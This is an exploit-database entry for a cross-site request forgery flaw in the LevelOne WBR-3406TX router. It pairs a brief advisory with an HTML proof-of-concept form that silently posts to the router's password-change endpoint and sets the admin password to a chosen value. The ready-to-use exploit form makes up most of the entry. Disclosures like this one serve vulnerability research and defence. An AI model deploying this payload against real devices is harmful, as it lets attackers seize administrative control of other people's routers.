LevelOne WBR-3406TX Router - Cross-Site Request Forgery

EDB-ID:

38851

CVE:





Platform:

Hardware

Date:

2013-11-15


source: https://www.securityfocus.com/bid/63908/info

LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.

<html>
<body>
<form action="http://www.example.com/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>